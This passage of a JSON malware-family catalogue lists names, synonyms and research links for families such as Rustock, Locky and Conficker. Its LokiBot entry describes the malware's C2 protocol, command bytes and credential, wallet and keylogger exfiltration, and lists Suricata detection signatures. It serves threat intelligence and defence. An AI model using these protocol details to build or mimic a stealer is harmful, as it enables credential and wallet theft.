"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
]
}
},
{
"uuid": "9aacd2c7-bcd6-4a82-8250-cab2e4e2d402",
"value": "FormerFirstRAT",
"description": "",
"meta": {
"synonyms": [
"ffrat"
],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/"
]
}
},
{
"uuid": "76e98e04-0ab7-4000-80ee-7bcbcf9c110d",
"value": "Rustock",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://sunbeltsecurity.com/dl/Rootkit%20Installation%20and%20Obfuscation%20in%20Rustock.pdf",
"http://blog.threatexpert.com/2008/05/rustockc-unpacking-nested-doll.html",
"http://contagiodump.blogspot.com/2011/10/rustock-samples-and-analysis-links.html",
"https://www.usenix.org/legacy/event/hotbots07/tech/full_papers/chiang/chiang_html/index.html",
"https://krebsonsecurity.com/2011/03/microsoft-hunting-rustock-controllers/",
"http://www.drweb.com/upload/6c5e138f917290cb99224a8f8226354f_1210062403_DDOCUMENTSArticales_PRDrWEB_RustockC_eng.pdf",
"https://www.secureworks.com/blog/research-21041",
"http://blog.novirusthanks.org/2008/11/i-wormnuwarw-rustocke-variant-analysis/"
]
}
},
{
"uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11",
"value": "KINS",
"description": "",
"meta": {
"synonyms": [
"Kasper Internet Non-Security",
"Maple"
],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/",
"https://www.youtube.com/watch?v=C-dEOt0GzSE",
"https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/",
"https://github.com/nyx0/KINS"
]
}
},
{
"uuid": "3008fa01-492a-42e2-ab9b-a0a9d12823b8",
"value": "Irc16",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://news.drweb.com/show/?c=5&i=10193&lng=en"
]
}
},
{
"uuid": "51da734c-70dd-4337-ab08-ab61457e0da5",
"value": "Shishiga",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/"
]
}
},
{
"uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8",
"value": "Agent.BTZ",
"description": "",
"meta": {
"synonyms": [
"Sun rootkit",
"ComRAT"
],
"type": [],
"refs": [
"http://www.intezer.com/new-variants-of-agent-btz-comrat-found/",
"https://securelist.com/blog/virus-watch/58551/agent-btz-a-source-of-inspiration/",
"https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf",
"http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html",
"https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified",
"http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/",
"https://blog.gdata.de/2015/01/23779-weiterentwicklung-anspruchsvoller-spyware-von-agent-btz-zu-comrat"
]
}
},
{
"uuid": "38de079b-cc4c-47b0-b47f-ad4c013d8a1f",
"value": "Zezin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/siri_urz/status/923479126656323584",
"http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4877"
]
}
},
{
"uuid": "272268bb-2715-476b-a121-49142581c559",
"value": "SeDll",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html",
"https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets"
]
}
},
{
"uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50",
"value": "MrBlack",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://news.drweb.com/?i=5760&c=23&lng=en"
]
}
},
{
"uuid": "122c1c9c-3131-4014-856c-7e8a0da57a6e",
"value": "Unidentified 031",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4",
"value": "ThreeByte",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html"
]
}
},
{
"uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217",
"value": "Mokes",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/"
]
}
},
{
"uuid": "057ff707-a008-4ab8-8370-22b689ed3412",
"value": "FlokiBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/",
"https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/",
"https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html",
"https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/",
"http://adelmas.com/blog/flokibot.php",
"http://blog.talosintel.com/2016/12/flokibot-collab.html#more",
"https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/",
"https://www.arbornetworks.com/blog/asert/flokibot-invades-pos-trouble-brazil/"
]
}
},
{
"uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3",
"value": "Avzhan",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/"
]
}
},
{
"uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12",
"value": "Kaiten",
"description": "",
"meta": {
"synonyms": [
"STD"
],
"type": [],
"refs": [
"https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf"
]
}
},
{
"uuid": "af3a3ece-e67f-457a-be72-7651bc720342",
"value": "Evrial",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/evrial-trojan-switches-bitcoin-addresses-copied-to-windows-clipboard/"
]
}
},
{
"uuid": "75b1e86f-fcc1-49a7-9b4e-7cd93e91b23f",
"value": "Revenge RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://isc.sans.edu/diary/rss/22590",
"http://blog.deniable.org/blog/2016/08/26/lurking-around-revenge-rat/"
]
}
},
{
"uuid": "6a4365fc-8448-4270-ba93-0341788d004b",
"value": "JenX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/"
]
}
},
{
"uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8",
"value": "NewCore RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations"
]
}
},
{
"uuid": "6d441619-c5f5-45ff-bc63-24cecd0b237e",
"value": "Fanny",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/#_1"
]
}
},
{
"uuid": "f544ee0e-26f4-48e7-aaee-056f4d1ced82",
"value": "Shurl0ckr",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/shurl0ckr-ransomware-as-a-service-peddled-on-dark-web-can-reportedly-bypass-cloud-applications"
]
}
},
{
"uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98",
"value": "CryptoShield",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/",
"http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/"
]
}
},
{
"uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2",
"value": "IoT Reaper",
"description": "",
"meta": {
"synonyms": [
"Reaper",
"IoTroop"
],
"type": [],
"refs": [
"http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/",
"https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm",
"https://research.checkpoint.com/new-iot-botnet-storm-coming/",
"https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/"
]
}
},
{
"uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c",
"value": "Locky",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
"https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/",
"https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/",
"http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html",
"https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/",
"https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/",
"https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/",
"https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html"
]
}
},
{
"uuid": "8a42a699-1746-498b-a558-e7113bb916c0",
"value": "Cpuminer",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/"
]
}
},
{
"uuid": "342be00c-cf68-45a6-8f90-3a2d2d20bda6",
"value": "Mebromi",
"description": "",
"meta": {
"synonyms": [
"MyBios"
],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/bios-threat-showing-again",
"https://www.webroot.com//blog/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/",
"http://contagiodump.blogspot.com/2011/09/mebromi-bios-rootkit-affecting-award.html",
"http://www.theregister.co.uk/2011/09/14/bios_rootkit_discovered/"
]
}
},
{
"uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b",
"value": "Maintools.js",
"description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/JohnLaTwC/status/915590893155098629"
]
}
},
{
"uuid": "b1b2e501-b68f-4e2e-ab98-85e9bda0fbcd",
"value": "Floxif",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library"
]
}
},
{
"uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7",
"value": "Persirai",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/"
]
}
},
{
"uuid": "2f512a73-6847-4231-81c6-8b51af8b5be2",
"value": "WildFire",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://labs.opendns.com/2016/07/13/wildfire-ransomware-gaining-momentum/"
]
}
},
{
"uuid": "f9d0e934-879c-4668-b959-6bf7bdc96f5d",
"value": "Bozok",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html"
]
}
},
{
"uuid": "bd7b1628-2aeb-44c5-91e7-f02c011034cf",
"value": "Rofin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc",
"value": "UDPoS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html",
"https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns"
]
}
},
{
"uuid": "85975621-5126-40cb-8083-55cbfa75121b",
"value": "BankBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/after-big-takedown-efforts-20-more-bankbot-mobile-malware-apps-make-it-into-google-play/",
"https://www.welivesecurity.com/2017/11/21/new-campaigns-spread-banking-malware-google-play/",
"http://b0n1.blogspot.de/2017/05/tracking-android-bankbot.html",
"http://blog.koodous.com/2017/04/decrypting-bankbot-communications.html",
"http://blog.koodous.com/2017/05/bankbot-on-google-play.html"
]
}
},
{
"uuid": "c1ccba65-e2f0-4f29-8e04-6b119c7f8694",
"value": "Skarab Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://malware-traffic-analysis.net/2017/11/23/index.html"
]
}
},
{
"uuid": "4cbe9373-6b5e-42d0-9750-e0b7fc0d58bb",
"value": "Regin",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.youtube.com/watch?v=jeLd-gw2bWo"
]
}
},
{
"uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62",
"value": "HLUX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "b459033c-2d19-49aa-a21f-44a01d1a4156",
"value": "WebC2-UGX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f",
"value": "Confucius",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/",
"https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/"
]
}
},
{
"uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d",
"value": "CyberGate",
"description": "",
"meta": {
"synonyms": [
"Rebhip"
],
"type": [],
"refs": [
"https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process"
]
}
},
{
"uuid": "4793a29b-1191-4750-810e-9301a6576fc4",
"value": "LokiBot",
"description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/R3MRUM/loki-parse",
"http://www.malware-traffic-analysis.net/2017/06/12/index.html",
"https://www.lastline.com/blog/password-stealing-malware-loki-bot/",
"https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file",
"http://blog.fernandodominguez.me/lokis-antis-analysis/",
"https://phishme.com/loki-bot-malware/",
"https://r3mrum.wordpress.com/2017/05/07/loki-bot-atrifacts/",
"https://cysinfo.com/nefarious-macro-malware-drops-loki-bot-across-gcc-countries/",
"https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850"
]
}
},
{
"uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886",
"value": "Bankshot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF",
"https://securingtomorrow.mcafee.com/mcafee-labs/hidden-cobra-targets-turkish-financial-sector-new-bankshot-implant/"
]
}
},
{
"uuid": "e145863e-f3bd-489c-91f6-0c2b7e9cc59a",
"value": "Luminosity RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/Light-After-Dark",
"https://umbrella.cisco.com/blog/2017/01/18/finding-the-rats-nest/",
"http://malwarenailed.blogspot.com/2016/07/luminosity-rat-re-purposed.html",
"https://researchcenter.paloaltonetworks.com/2016/07/unit42-investigating-the-luminositylink-remote-access-trojan-configuration/",
"https://researchcenter.paloaltonetworks.com/2018/02/unit42-rat-trapped-luminositylink-falls-foul-vermin-eradication-efforts/"
]
}
},
{
"uuid": "b746a645-5974-44db-a811-a024214b7fba",
"value": "running_rat",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
]
}
},
{
"uuid": "6a100902-7204-4f20-b838-545ed86d4428",
"value": "WinMM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf",
"https://securelist.com/analysis/publications/69953/the-naikon-apt/",
"https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
]
}
},
{
"uuid": "4305d59a-0d07-4021-a902-e7996378898b",
"value": "FlexiSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/"
]
}
},
{
"uuid": "61b2dd12-2381-429d-bb64-e3210804a462",
"value": "DirCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/",
"https://www.checkpoint.com/download/public-files/TCC_WP_Hacking_The_Hacker.pdf"
]
}
},
{
"uuid": "9b0aa458-dfa9-48af-87ea-c36d1501376c",
"value": "ZeroT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
]
}
},
{
"uuid": "e6952b4d-e96d-4641-a88f-60074776d553",
"value": "RTM",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
]
}
},
{
"uuid": "d3b5a884-1fd6-4cc4-9837-7d8ee8817711",
"value": "Dorshel",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
]
}
},
{
"uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca",
"value": "Kazuar",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/"
]
}
},
{
"uuid": "71d8ef43-3767-494b-afaa-f58aad70df65",
"value": "WebC2-Qbp",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "ac2608e9-7851-409f-b842-e265b877a53c",
"value": "7ev3n",
"description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/",
"https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n"
]
}
},
{
"uuid": "1ebb6107-f97b-45f6-ae81-a671ac437181",
"value": "GooPic Drooper",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/angler-shift-ek-landscape-new-crytpo-ransomware-activity/"
]
}
},
{
"uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f",
"value": "HttpBrowser",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/"
]
}
},
{
"uuid": "80f87001-ff40-4e33-bd12-12ed1a92d1d7",
"value": "RawPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/rawpos-new-behavior-risks-identity-theft/?platform=hootsuite"
]
}
},
{
"uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d",
"value": "OpBlockBuster",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/"
]
}
},
{
"uuid": "d3e16d46-e436-4757-b962-6fd393056415",
"value": "Apocalipto",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf"
]
}
},
{
"uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1",
"value": "AdamLocker",
"description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victims system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016",
"https://twitter.com/JaromirHorejsi/status/813712587997249536"
]
}
},
{
"uuid": "16dcc67b-4415-4620-818d-7ca24a5ccaf5",
"value": "RokRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/002/191/original/Talos_RokRatWhitePaper.pdf",
"http://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"http://blog.talosintelligence.com/2017/11/ROKRAT-Reloaded.html",
"https://www.youtube.com/watch?v=uoBQE5s2ba4",
"https://www.carbonblack.com/2018/02/27/threat-analysis-rokrat-malware/"
]
}
},
{
"uuid": "3482f5fe-f129-4c77-ae98-76e25f6086b9",
"value": "Viper RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/blog/incidents/77562/breaking-the-weakest-link-of-the-strongest-chain/",
"https://blog.lookout.com/blog/2017/02/16/viperrat-mobile-apt/"
]
}
},
{
"uuid": "15094548-7555-43ee-8c0d-4557d6d8a087",
"value": "WebC2-Kt3",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.scribd.com/document/349629589/Appendix-C-Digital-The-Malware-Arsenal-pdf"
]
}
},
{
"uuid": "b749ff3a-df68-4b38-91f1-649864eae52c",
"value": "Pirrit",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/",
"http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf"
]
}
},
{
"uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2",
"value": "Xaynnalc",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/michalmalik/status/846368624147353601"
]
}
},
{
"uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212",
"value": "Conficker",
"description": "",
"meta": {
"synonyms": [
"traffic converter",
"downadup"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2009/05/win32conficker.html"
]
}
},
{
"uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e",
"value": "Acronym",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/"
]
}
},
{
"uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706",
"value": "Credraptor",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/"
]
}
},
{
"uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930",
"value": "Dockster",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html",
"https://www.f-secure.com/weblog/archives/00002466.html"
]
}
},
{
"uuid": "74f8db32-799c-41e5-9815-6272908ede57",
"value": "MS Exchange Tool",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/nccgroup/Royal_APT",
"https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/"
]
}
},
{
"uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db",
"value": "Darktrack RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml",
"https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html"
]
}
},
{
"uuid": "f5cabe73-b5d6-4503-8350-30a6d54c32ef",
"value": "Raxir",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/PhysicalDrive0/statuses/798825019316916224"
]
}
},
{
"uuid": "faa2196f-df4c-454c-995e-ded7864d5fa8",
"value": "Stabuniq",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html",
"https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers"
]
}
},
{
"uuid": "892cb6c2-b96c-4f77-a9cf-4dd3d0c1cc40",
"value": "WMI Ghost",
"description": "",
"meta": {
"synonyms": [
"Wimmie",
"Syndicasec"
],
"type": [],
"refs": [
